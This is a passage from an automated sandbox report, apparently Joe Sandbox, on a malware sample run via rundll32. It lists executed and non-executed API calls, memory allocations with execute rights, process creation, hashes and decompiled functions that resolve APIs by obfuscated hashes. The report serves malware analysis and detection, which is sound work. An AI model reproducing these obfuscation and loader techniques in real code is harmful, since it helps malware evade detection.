                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 0044EDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_430000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction ID: 8bd723dc9d2518fcffe7ceefaee933f8e6213669cd646feab00009da15ecd618
                                                                      • Opcode Fuzzy Hash: ad1daf5a7c910bd02d1d72619915e1fdd92f553c09c4da0439c37bff57805f65
                                                                      • Instruction Fuzzy Hash: 2AC1B9B5A00209DFDB48CF89C590EAEB7B6BF88304F148159E9199B351D735EE42CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 129 3d1a14-3d1a5a call 3d1ac8 135 3d1a5c-3d1a69 129->135 136 3d1a70-3d1aa7 DdeCreateStringHandleA DdeNameService 129->136 135->136 139 3d1aaf 136->139
                                                                      APIs
                                                                        • Part of subcall function 003D1AC8: DdeFreeStringHandle.USER32(?,?), ref: 003D1AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 003D1A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 003D1A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      • Opcode ID: b1285734a8fd2558f738f05895e06de6f9b3d46b391a40d7d42309368a9e31d7
                                                                      • Instruction ID: c604ed27e88ebdf04e8c4c213b88b4df8b8139de5efda60d44bdad3cf6864fa3
                                                                      • Opcode Fuzzy Hash: b1285734a8fd2558f738f05895e06de6f9b3d46b391a40d7d42309368a9e31d7
                                                                      • Instruction Fuzzy Hash: CB118232721254AFCB27EFA4D882A4A37ADAF09B00B414561FC049F347D774ED008794
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 140 377f4b-377ffd call 382550 call 377378 lstrcmpiW
                                                                      C-Code - Quality: 80%
                                                                      			E00377F4B(WCHAR* __ecx, void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				void* _t35;
                                                                      				int _t43;
                                                                      				WCHAR* _t46;
                                                                      
                                                                      				_push(_a12);
                                                                      				_t46 = __ecx;
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00382550(_t35);
                                                                      				_v24 = _v24 & 0x00000000;
                                                                      				_v32 = 0x71485a;
                                                                      				_v28 = 0x57c810;
                                                                      				_v20 = 0x2813;
                                                                      				_v20 = _v20 * 0x59;
                                                                      				_v20 = _v20 ^ 0x000dd428;
                                                                      				_v16 = 0xdb84;
                                                                      				_v16 = _v16 | 0xe2c96d38;
                                                                      				_v16 = _v16 ^ 0xe2c994d7;
                                                                      				_v12 = 0xc19e;
                                                                      				_v12 = _v12 >> 7;
                                                                      				_v12 = _v12 ^ 0x000060ae;
                                                                      				_v8 = 0x265e;
                                                                      				_v8 = _v8 + 0x315a;
                                                                      				_v8 = _v8 << 0xb;
                                                                      				_v8 = _v8 ^ 0x02bd94c0;
                                                                      				E00377378(__ecx, 0x8a39c19d, __ecx, 0x90f109b3, 0x96);
                                                                      				_t43 = lstrcmpiW(_t46, _a4); // executed
                                                                      				return _t43;
                                                                      			}














                                                                      APIs
                                                                      • lstrcmpiW.KERNELBASE(?,000060AE,?,?,?,?,?,?,?,?,?,00000000), ref: 00377FF7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: lstrcmpi
                                                                      • String ID: ZHq
                                                                      • API String ID: 1586166983-2177431251
                                                                      • Opcode ID: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction ID: 16b577d0bcda0dcab934cfded856c8fb505bee7df177a0ea4de0cad7d20423a5
                                                                      • Opcode Fuzzy Hash: 1dbb23c816d530a556f00a9c331316415ddf5d0f243181d7c072a17d6123fc67
                                                                      • Instruction Fuzzy Hash: B611DFB6C01219ABDF11EFA4C94A8DEBFB4EF04318F108588E92466251D3B95B15DFA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 145 44e620-44e66b call 44ea10 148 44e66d-44e677 call 44ea10 145->148 149 44e67a-44e6aa call 44e390 VirtualAlloc 145->149 148->149
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 0044E6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109890189.0000000000430000.00000040.00000001.sdmp, Offset: 00430000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_430000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      • Opcode ID: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction ID: f68585dbf165f55ab7430a9f1256731307a7b5d0931006dc10806d55b97b0460
                                                                      • Opcode Fuzzy Hash: a77aec488e472259a9f8f903e2d2770156d735046b38bce3c934600cf440992a
                                                                      • Instruction Fuzzy Hash: 7C113060D08289DAFF01D7E994097FFBFB56B11708F044098D5447B282D2BE57588BA6
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 170 38b86e-38b949 call 382550 call 377378 CreateProcessW
                                                                      C-Code - Quality: 40%
                                                                      			E0038B86E(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a24, struct _PROCESS_INFORMATION* _a40, intOrPtr _a44, intOrPtr _a48, WCHAR* _a52, intOrPtr _a56, struct _STARTUPINFOW* _a60, intOrPtr _a68) {
                                                                      				signed int _v8;
                                                                      				unsigned int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t49;
                                                                      				int _t58;
                                                                      				signed int _t60;
                                                                      				int _t65;
                                                                      
                                                                      				_push(_a68);
                                                                      				_t65 = __ecx;
                                                                      				_push(0);
                                                                      				_push(_a60);
                                                                      				_push(_a56);
                                                                      				_push(_a52);
                                                                      				_push(_a48);
                                                                      				_push(_a44);
                                                                      				_push(_a40);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(0);
                                                                      				_push(_a24);
                                                                      				_push(0);
                                                                      				_push(_a16);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__ecx);
                                                                      				E00382550(_t49);
                                                                      				_v12 = 0xd1fa;
                                                                      				_t60 = 0x3c;
                                                                      				_v12 = _v12 / _t60;
                                                                      				_v12 = _v12 >> 0xa;
                                                                      				_v12 = _v12 ^ 0x00001682;
                                                                      				_v20 = 0xd4c2;
                                                                      				_v20 = _v20 + 0x3986;
                                                                      				_v20 = _v20 ^ 0x00013905;
                                                                      				_v8 = 0x8c53;
                                                                      				_v8 = _v8 >> 4;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 ^ 0x000060d6;
                                                                      				_v16 = 0x467b;
                                                                      				_v16 = _v16 + 0xffff2b71;
                                                                      				_v16 = _v16 ^ 0xffff105c;
                                                                      				E00377378(_t60, 0x8aa9db76, _t60, 0x90f109b3, 0x100);
                                                                      				_t58 = CreateProcessW(_a52, _a24, 0, 0, _t65, 0, 0, 0, _a60, _a40); // executed
                                                                      				return _t58;
                                                                      			}












                                                                      APIs
                                                                      • CreateProcessW.KERNEL32(?,?,00000000,00000000,?,00000000,00000000,00000000,?,?), ref: 0038B942
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CreateProcess
                                                                      • String ID:
                                                                      • API String ID: 963392458-0
                                                                      • Opcode ID: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction ID: d982bbd4a9d0bbea0d6cfe131df5bee83783e35b98a4dfb9c2a3566cb56867c5
                                                                      • Opcode Fuzzy Hash: 0c2a7e7f22d8817370b5b33d85e2b014bcdf9d8a6a03b3886b5f04f00f255257
                                                                      • Instruction Fuzzy Hash: 3921B572800248BBDF169F95CD09CDFBFB9FB89714F408158FA1466160D7B69A60DBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 175 37471a-3747ea call 382550 call 377378 SHGetFolderPathW
                                                                      C-Code - Quality: 58%
                                                                      			E0037471A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				void* _t50;
                                                                      				intOrPtr* _t61;
                                                                      				void* _t62;
                                                                      				signed int _t63;
                                                                      				signed int _t64;
                                                                      
                                                                      				E00382550(_t50);
                                                                      				_v20 = 0xf336;
                                                                      				_v20 = _v20 + 0x29f7;
                                                                      				_v20 = _v20 ^ 0x000152a0;
                                                                      				_v8 = 0xc9c4;
                                                                      				_v8 = _v8 >> 0x10;
                                                                      				_v8 = _v8 << 3;
                                                                      				_t63 = 0x6d;
                                                                      				_v8 = _v8 * 0x43;
                                                                      				_v8 = _v8 ^ 0x0000467c;
                                                                      				_v16 = 0x763b;
                                                                      				_t64 = 0x2d;
                                                                      				_v16 = _v16 / _t63;
                                                                      				_v16 = _v16 << 4;
                                                                      				_v16 = _v16 ^ 0x000058e5;
                                                                      				_v12 = 0x527e;
                                                                      				_v12 = _v12 / _t64;
                                                                      				_v12 = _v12 | 0xd776a7a3;
                                                                      				_v12 = _v12 ^ 0xd776f938;
                                                                      				_t61 = E00377378(_t64, 0x23d331d1, _t64, 0xd20b8aa4, 0x174);
                                                                      				_t62 =  *_t61(0, _a4, 0, 0, _a8, 0, 0, _a4, _a8, _a12, _a16, _a20, _a24, _a28, 0); // executed
                                                                      				return _t62;
                                                                      			}













                                                                      APIs
                                                                      • SHGetFolderPathW.SHELL32(00000000,D776F938,00000000,00000000,000058E5), ref: 003747E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109656728.0000000000370000.00000040.00020000.sdmp, Offset: 00370000, based on PE: true
                                                                      • Associated: 00000011.00000002.2109747843.0000000000390000.00000040.00020000.sdmp
                                                                      • Associated: 00000011.00000002.2109761138.0000000000392000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_370000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FolderPath
                                                                      • String ID:
                                                                      • API String ID: 1514166925-0
                                                                      • Opcode ID: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction ID: eec9f8167817eead5720bab2c6ab1532545c95e219ead10e06bbc818f28e684d
                                                                      • Opcode Fuzzy Hash: 0a1e481ed0b4bb684b4a4fbdce82325e9ffb300045724f91d1da592bf306b1e2
                                                                      • Instruction Fuzzy Hash: 1E210372D01208FBEF15DFE4C94A8DEBBB5EF05354F108089E924AA250D3B59B10DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00398361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0039839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003983A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      • Opcode ID: 7852f6ab3cc76c167b557f4722f18a20d023df66d34fc2b01772c39cd475adcd
                                                                      • Instruction ID: 161e60deb336ecb85954881dfc0e022f535172b301134b9c48ce7a63e4a931ae
                                                                      • Opcode Fuzzy Hash: 7852f6ab3cc76c167b557f4722f18a20d023df66d34fc2b01772c39cd475adcd
                                                                      • Instruction Fuzzy Hash: A411E97E6027059FDB22CF64EC857A7B7ECEB86B14F00452AED56D7240DBB0A804C7A0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 003985E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0039860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00398615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      • Opcode ID: a794cd2beed358691d6493059eef5c57589e1198f3acd662009763edc32945d1
                                                                      • Instruction ID: 4a0c1776f7b56326eca4a46ce745a3817656afeaa1dc6fe1d7a61dc90b118775
                                                                      • Opcode Fuzzy Hash: a794cd2beed358691d6493059eef5c57589e1198f3acd662009763edc32945d1
                                                                      • Instruction Fuzzy Hash: D631F0B2A0520AAFDF12DFA4DD459EF77BCAB86304F014526EA15D7201DB34D904CBA1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00398471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0039847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      • Opcode ID: f8609ae9b261645e6d07139d412ed785dcd78492796b80f43c01c0caf70d64b8
                                                                      • Instruction ID: d2cc4fc5a6676d42e9d0aa4de2351f3e2825b88a472998cac5a0f7adccfbc3dc
                                                                      • Opcode Fuzzy Hash: f8609ae9b261645e6d07139d412ed785dcd78492796b80f43c01c0caf70d64b8
                                                                      • Instruction Fuzzy Hash: 7611D6316027059FDB22CF61AC467E7B7ECEF86720F00452AED55DB240DB70A84087A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00398545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00398550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      • Opcode ID: b647f244b764995b5290214e44e2720819137f3bfdf00889223fa66011e5009d
                                                                      • Instruction ID: a14e0bd6cfa7037a24772400445c9567e1a42339faadec4a168815617b3a2849
                                                                      • Opcode Fuzzy Hash: b647f244b764995b5290214e44e2720819137f3bfdf00889223fa66011e5009d
                                                                      • Instruction Fuzzy Hash: 56110871A027049FDB22CF649C45BA7B7ECEB47310F05492BED59D7280DB71A809CBA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003982E6
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003982F8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromPoint
                                                                      • API String ID: 4116985748-3670600901
                                                                      • Opcode ID: 19dfc73e612e1170d84dda4d7a9f623d8db6d1f6855100fcde0791c00b905440
                                                                      • Instruction ID: 5eff99e5c28bc821fc9f302779d84fffbc4fa29255ac0543ffdd64589dea7310
                                                                      • Opcode Fuzzy Hash: 19dfc73e612e1170d84dda4d7a9f623d8db6d1f6855100fcde0791c00b905440
                                                                      • Instruction Fuzzy Hash: B901D13E203308AFDF024F50ECC5B9E7B99EB82B50F044126F9A4DB211CB70AC108BA0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 003981C1
                                                                      • GetSystemMetrics.USER32(00000001), ref: 003981CD
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$MonitorFromRect
                                                                      • API String ID: 4116985748-120404372
                                                                      • Opcode ID: 7b14c3acf82b982663c5838e02fd0335a4e9d85234f6ff9d26ea404d4cdf4fbd
                                                                      • Instruction ID: 7a6f30c6f2a72769283a0d35a8dc904a1edcfe277b220aae084cc0b44981e464
                                                                      • Opcode Fuzzy Hash: 7b14c3acf82b982663c5838e02fd0335a4e9d85234f6ff9d26ea404d4cdf4fbd
                                                                      • Instruction Fuzzy Hash: 900181322012159BDF129F14EC86B57B79DE782399F158063ED14CB202CB75DC429BB0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeCreateStringHandleA.USER32(00000015,00000000), ref: 003D2B7C
                                                                      • DdeClientTransaction.USER32(00000000,000000FF,00000000,?,?,00001034,000003E8,?), ref: 003D2BA9
                                                                      • DdeGetLastError.USER32(00000015), ref: 003D2BBB
                                                                      • DdeFreeStringHandle.USER32(00000015,?), ref: 003D2BCD
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$ClientCreateErrorFreeLastTransaction
                                                                      • String ID:
                                                                      • API String ID: 2421758087-0
                                                                      • Opcode ID: b00ff0f742862629121b1fec3519ff44e08ce37f379cba0a90b45280c9893d35
                                                                      • Instruction ID: 3407da8d9a4d85b6f2bf5dc44b3a33b888a4794c44b3160ff0dc31c97d65f1d8
                                                                      • Opcode Fuzzy Hash: b00ff0f742862629121b1fec3519ff44e08ce37f379cba0a90b45280c9893d35
                                                                      • Instruction Fuzzy Hash: CC2159762042409FDB46EF68D8C1F6AB7E8AB49310F158196F998CF3A6D771EC40CB61
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • DdeQueryConvInfo.USER32(?,?,00000060), ref: 003D14BF
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: ConvInfoQuery
                                                                      • String ID: 0=$`
                                                                      • API String ID: 701148680-2555861442
                                                                      • Opcode ID: b4db6d67cc8babdf83d1d6461c9baf622cc0bfce56d874b93291c4b029b3ebfc
                                                                      • Instruction ID: a18dec4fa734df6733bd2722349b098e64425b59b65a3b022b1701a265ad18ac
                                                                      • Opcode Fuzzy Hash: b4db6d67cc8babdf83d1d6461c9baf622cc0bfce56d874b93291c4b029b3ebfc
                                                                      • Instruction Fuzzy Hash: 60519377A04219AFCB12EE6CF9859AE73BAEB48350F154022FD06DB744CA34DD05C7A1
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(?), ref: 00398110
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000011.00000002.2109773757.0000000000393000.00000020.00020000.sdmp, Offset: 00393000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_17_2_393000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$GetSystemMetrics
                                                                      • API String ID: 4116985748-3773086709
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Executed Functions

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • GetEnhMetaFileA.GDI32(trty55345), ref: 004639C2
                                                                      • VirtualAlloc.KERNELBASE(00000000,00466CB4,00001000,00000040), ref: 00463A8E
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: AllocFileMetaVirtual
                                                                      • String ID: trty55345$|lF
                                                                      • API String ID: 2643768156-462011533
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • DdeInitializeA.USER32(00000044,Function_0003E428,00000000,00000000), ref: 00461686
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: Initialize
                                                                      • String ID: Link
                                                                      • API String ID: 2538663250-2526951119
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 001CEB8F
                                                                      • VirtualProtect.KERNELBASE(?,?,00000000), ref: 001CEDD9
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                        • Part of subcall function 00461AC8: DdeFreeStringHandle.USER32(?,?), ref: 00461AE8
                                                                      • DdeCreateStringHandleA.USER32(?,00000000), ref: 00461A82
                                                                      • DdeNameService.USER32(?,00000000,00000000,00000001), ref: 00461A95
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: HandleString$CreateFreeNameService
                                                                      • String ID:
                                                                      • API String ID: 374373348-0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Control-flow Graph

                                                                      [Control-flow graph figure; legend: Executed / Not Executed]
                                                                      APIs
                                                                      • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 001CE6A4
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2110708042.00000000001B0000.00000040.00000001.sdmp, Offset: 001B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_1b0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID: VirtualAlloc
                                                                      • API String ID: 4275171209-164498762
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Non-executed Functions

                                                                      APIs
                                                                      • GetMonitorInfoA.USER32(?,?), ref: 00428361
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042839D
                                                                      • GetSystemMetrics.USER32(00000001), ref: 004283A8
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$InfoMonitor
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfo
                                                                      • API String ID: 4250584380-1428758730
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • EnumDisplayMonitors.USER32(?,?,?,?), ref: 004285E5
                                                                      • GetSystemMetrics.USER32(00000000), ref: 0042860A
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428615
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem$DisplayEnumMonitors
                                                                      • String ID: /}Au$EnumDisplayMonitors
                                                                      • API String ID: 1389147845-1105134141
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428471
                                                                      • GetSystemMetrics.USER32(00000001), ref: 0042847C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoA
                                                                      • API String ID: 4116985748-2822609925
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 00428545
                                                                      • GetSystemMetrics.USER32(00000001), ref: 00428550
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000012.00000002.2111465783.0000000000423000.00000020.00020000.sdmp, Offset: 00423000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_18_2_423000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: MetricsSystem
                                                                      • String ID: /}Au$DISPLAY$GetMonitorInfoW
                                                                      • API String ID: 4116985748-1558784340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetSystemMetrics.USER32(00000000), ref: 004282E6
